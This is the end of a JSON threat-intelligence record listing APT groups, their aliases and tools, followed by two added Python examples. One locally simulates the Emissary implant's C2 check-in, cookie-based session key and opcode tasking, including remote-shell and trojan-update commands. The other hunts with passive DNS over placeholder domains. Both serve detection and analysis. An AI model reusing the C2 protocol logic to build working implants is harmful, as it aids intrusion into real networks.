				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2fa14cf4-969f-48bc-b68e-a8e7eedc6e98",
			"created_at": "2022-10-25T15:50:23.538608Z",
			"updated_at": "2026-04-10T02:00:05.378092Z",
			"deleted_at": null,
			"main_name": "Lotus Blossom",
			"aliases": [
				"Lotus Blossom",
				"DRAGONFISH",
				"Spring Dragon",
				"RADIUM",
				"Raspberry Typhoon",
				"Bilbug",
				"Thrip"
			],
			"source_name": "MITRE:Lotus Blossom",
			"tools": [
				"AdFind",
				"Impacket",
				"Elise",
				"Hannotog",
				"NBTscan",
				"Sagerunex",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "33ae2a40-02cd-4dba-8461-d0a50e75578b",
			"created_at": "2023-01-06T13:46:38.947314Z",
			"updated_at": "2026-04-10T02:00:03.155091Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"UNC1326",
				"COSMIC WOLF",
				"Marbled Dust",
				"SILICON",
				"Teal Kurma"
			],
			"source_name": "MISPGALAXY:Sea Turtle",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c21da9ce-944f-4a37-8ce3-71a0f738af80",
			"created_at": "2025-08-07T02:03:24.586257Z",
			"updated_at": "2026-04-10T02:00:03.804264Z",
			"deleted_at": null,
			"main_name": "BRONZE ELGIN",
			"aliases": [
				"CTG-8171 ",
				"Lotus Blossom ",
				"Lotus Panda ",
				"Lstudio",
				"Spring Dragon "
			],
			"source_name": "Secureworks:BRONZE ELGIN",
			"tools": [
				"Chrysalis",
				"Cobalt Strike",
				"Elise",
				"Emissary Trojan",
				"Lzari",
				"Meterpreter"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "62b1b01f-168d-42db-afa1-29d794abc25f",
			"created_at": "2025-04-23T02:00:55.22426Z",
			"updated_at": "2026-04-10T02:00:05.358041Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Sea Turtle",
				"Teal Kurma",
				"Marbled Dust",
				"Cosmic Wolf",
				"SILICON"
			],
			"source_name": "MITRE:Sea Turtle",
			"tools": [
				"SnappyTCP"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "87a20b72-ab72-402f-9013-c746c8458b0b",
			"created_at": "2023-01-06T13:46:38.293223Z",
			"updated_at": "2026-04-10T02:00:02.915184Z",
			"deleted_at": null,
			"main_name": "LOTUS PANDA",
			"aliases": [
				"Red Salamander",
				"Lotus BLossom",
				"Billbug",
				"Spring Dragon",
				"ST Group",
				"BRONZE ELGIN",
				"ATK1",
				"G0030",
				"Lotus Blossom",
				"DRAGONFISH"
			],
			"source_name": "MISPGALAXY:LOTUS PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eaa8168f-3fab-4831-aa60-5956f673e6b3",
			"created_at": "2022-10-25T16:07:23.805824Z",
			"updated_at": "2026-04-10T02:00:04.754761Z",
			"deleted_at": null,
			"main_name": "Lotus Blossom",
			"aliases": [
				"ATK 1",
				"ATK 78",
				"Billbug",
				"Bronze Elgin",
				"CTG-8171",
				"Dragonfish",
				"G0030",
				"G0076",
				"Lotus Blossom",
				"Operation Lotus Blossom",
				"Red Salamander",
				"Spring Dragon",
				"Thrip"
			],
			"source_name": "ETDA:Lotus Blossom",
			"tools": [
				"BKDR_ESILE",
				"Catchamas",
				"EVILNEST",
				"Elise",
				"Group Policy Results Tool",
				"Hannotog",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"PsExec",
				"Rikamanu",
				"Sagerunex",
				"Spedear",
				"Syndicasec",
				"WMI Ghost",
				"Wimmie",
				"gpresult"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434551,
	"ts_updated_at": 1775792067,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8c24226faacc952e606ef9d3fdda0216f13b9f5b.pdf",
		"text": "https://archive.orkl.eu/8c24226faacc952e606ef9d3fdda0216f13b9f5b.txt",
		"img": "https://archive.orkl.eu/8c24226faacc952e606ef9d3fdda0216f13b9f5b.jpg"
	}
}
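Worked example for the Emissary check-in and tasking exchange described in the archived article above: the showip.net marker the implant parses for its external IP, the Set-Cookie SID value that decodes to a 36-character GUID session key, the “op=<command>” tasking body, the Table 2 command handler and its literal “unkown:%s” log line. This is an added Python model, not Emissary’s code and not Unit 42’s tooling. Only those message shapes and opcodes come from the article; the rolling XOR routine and its seed, the use of the GUID as a repeating XOR key for the tasking body, the GUID value and the showip.net HTML are assumptions or constructed sample input.

```python
"""Model of the Emissary 5.3 check-in and tasking exchange (added example,
not Emissary's code).

From the article: the showip.net marker, Set-Cookie SID=<base64>, the
op=<command> body, opcodes 102-107 and the "unkown:%s" log line.
Assumed stand-ins: the rolling XOR routine and seed, the GUID used as a
repeating XOR key for tasking, and every sample value.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Marker Emissary searches for in the showip.net response (from the article).
SHOWIP_MARKER = '<input id="checkip" type="text" name="check_ip" value='

# Constructed showip.net-style page used as sample input.
SAMPLE_SHOWIP_HTML = (
    '<html><body><form>'
    '<input id="checkip" type="text" name="check_ip" value="198.51.100.23" />'
    '</form></body></html>'
)

GUID_RE = re.compile(r"^[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}$", re.I)
SID_SEED = 0x5A  # assumed seed for the stand-in rolling XOR

# Table 2: Emissary 5.3 command handler.
COMMANDS: Dict[str, str] = {
    "102": "upload file to C2",
    "103": "execute command",
    "104": "download file from C2",
    "105": "update configuration",
    "106": "create remote shell",
    "107": "update trojan executable",
}


def extract_external_ip(html: str) -> str:
    """Locate the marker and read the quoted value after it, as the article
    describes the implant doing."""
    idx = html.find(SHOWIP_MARKER)
    if idx < 0:
        raise ValueError("checkip marker not found")
    m = re.match(r'"([0-9.]+)"', html[idx + len(SHOWIP_MARKER):])
    if not m:
        raise ValueError("no IP after marker")
    return m.group(1)


def rolling_xor(data: bytes, seed: int) -> bytes:
    """ASSUMED stand-in for the 'rolling XOR': one-byte key incremented after
    every byte. XOR is symmetric, so this both encrypts and decrypts."""
    out = bytearray()
    k = seed & 0xFF
    for b in data:
        out.append(b ^ k)
        k = (k + 1) & 0xFF
    return bytes(out)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """ASSUMED stand-in for the GUID-keyed cipher: repeating-key XOR."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def server_checkin_response(guid: str) -> Dict[str, str]:
    """C2 side: hand the session GUID to the implant in Set-Cookie: SID=<b64>."""
    sid = base64.b64encode(rolling_xor(guid.encode(), SID_SEED)).decode()
    return {"Set-Cookie": f"SID={sid}; path=/"}


def client_parse_sid(headers: Dict[str, str]) -> str:
    """Implant side: base64-decode and decrypt SID, insist on a 36-char GUID."""
    m = re.search(r"(?:^|;\s*)SID=([A-Za-z0-9+/=]+)", headers.get("Set-Cookie", ""))
    if not m:
        raise ValueError("no SID cookie")
    guid = rolling_xor(base64.b64decode(m.group(1)), SID_SEED).decode("ascii", "replace")
    if len(guid) != 36 or not GUID_RE.match(guid):
        raise ValueError(f"SID did not decode to a GUID: {guid!r}")
    return guid


def server_task(op: str, guid: str) -> bytes:
    """C2 side: tasking body 'op=<command>' encrypted under the session GUID
    (assumption; the article only says the implant decrypts the body)."""
    return xor_with_key(f"op={op}".encode(), guid.encode())


def client_dispatch(body: bytes, guid: str, log: List[str]) -> Optional[str]:
    """Implant side: decrypt, parse op=NNN, dispatch through Table 2; an
    unknown opcode is logged as 'unkown:%s' (the article's literal string)."""
    text = xor_with_key(body, guid.encode()).decode("ascii", "replace")
    m = re.fullmatch(r"op=(\d{3})", text)
    op = m.group(1) if m else text
    action = COMMANDS.get(op)
    if action is None:
        log.append("unkown:%s" % op)
        return None
    log.append(f"op {op}: {action}")
    return action


def run_session(ops: List[str]) -> Tuple[str, List[str]]:
    """Drive one constructed exchange end to end; returns (session GUID, log)."""
    guid = "3f2504e0-4f89-11d3-9a0c-0305e82c3301"  # constructed session GUID
    session_key = client_parse_sid(server_checkin_response(guid))
    log: List[str] = []
    for op in ops:
        client_dispatch(server_task(op, session_key), session_key, log)
    return session_key, log


if __name__ == "__main__":
    print("external IP:", extract_external_ip(SAMPLE_SHOWIP_HTML))
    key, log = run_session(["103", "106", "999"])
    print("session key:", key)
    print("\n".join(log))
```

The detection value is in the invariants rather than the cipher details: a Set-Cookie whose SID base64-decodes to a fixed-length blob that the client must turn into a 36-character GUID, and response bodies that decrypt to a short “op=NNN” string, are the observables to build signatures and sandbox checks around, whichever XOR variant a given sample uses.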
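Added hunting example for the two observations in the Threat Infrastructure section above: the co-resolution overlap between a C2 domain and another domain during the same time frame (the Figure 9 pivot), and a standby C2 domain parked on 127.0.0.1 until the operators need it. The passive-DNS records, domain names and addresses are constructed placeholders (RFC 2606 names, RFC 5737 addresses), not the article’s indicators, and the overlap and parking checks are this example’s own logic, not Unit 42’s tooling.

```python
"""Passive-DNS pivots for the Threat Infrastructure observations (added
example). Records, names and addresses are constructed placeholders, not the
article's indicators."""
import ipaddress
from datetime import date
from typing import Dict, List, Set, Tuple

# (domain, ip, first_seen, last_seen) - constructed passive-DNS sample
PdnsRecord = Tuple[str, str, date, date]
PDNS: List[PdnsRecord] = [
    ("c2-primary.example",   "203.0.113.10", date(2015, 9, 1),   date(2015, 10, 15)),
    ("overlap.example",      "203.0.113.10", date(2015, 9, 20),  date(2015, 11, 1)),
    ("c2-primary.example",   "203.0.113.11", date(2015, 10, 16), date(2015, 11, 20)),
    ("overlap.example",      "203.0.113.11", date(2015, 10, 20), date(2015, 12, 1)),
    ("c2-secondary.example", "127.0.0.1",    date(2015, 8, 1),   date(2015, 12, 18)),
    ("unrelated.example",    "203.0.113.10", date(2014, 1, 1),   date(2014, 6, 1)),
]

# Address space an operational C2 cannot live in; a domain parked here is the
# "resolve to localhost until needed" pattern the article describes.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
)]


def overlapping_domains(records: List[PdnsRecord], seed: str) -> Dict[str, Set[str]]:
    """For each IP the seed domain resolved to, the other domains that resolved
    to the same IP while the seed's window was open: shared IP AND overlapping
    dates. Same IP in a different era (unrelated.example) is treated as noise."""
    hits: Dict[str, Set[str]] = {}
    for dom1, ip1, s1, e1 in records:
        if dom1 != seed:
            continue
        for dom2, ip2, s2, e2 in records:
            if dom2 == seed or ip2 != ip1:
                continue
            if s2 <= e1 and s1 <= e2:  # closed date intervals intersect
                hits.setdefault(ip1, set()).add(dom2)
    return hits


def is_parked(ip: str) -> bool:
    """True if the address is loopback, unspecified, link-local or RFC 1918."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in NON_ROUTABLE)


def parked_domains(records: List[PdnsRecord]) -> List[str]:
    """Domains whose most recent A record is parked on a non-routable address."""
    latest: Dict[str, Tuple[date, str]] = {}
    for dom, ip, _, last in records:
        if dom not in latest or last > latest[dom][0]:
            latest[dom] = (last, ip)
    return sorted(dom for dom, (_, ip) in latest.items() if is_parked(ip))


if __name__ == "__main__":
    for ip, doms in overlapping_domains(PDNS, "c2-primary.example").items():
        print(f"{ip}: co-resolved with {sorted(doms)}")
    print("parked:", parked_domains(PDNS))
```

The operational follow-up is to watch the parked set over time: per the article the operators flip the record to a routable address when the server goes live, so a known C2 domain whose A record changes from loopback to anything that `is_parked` rejects is a higher-fidelity alert than the static indicator alone.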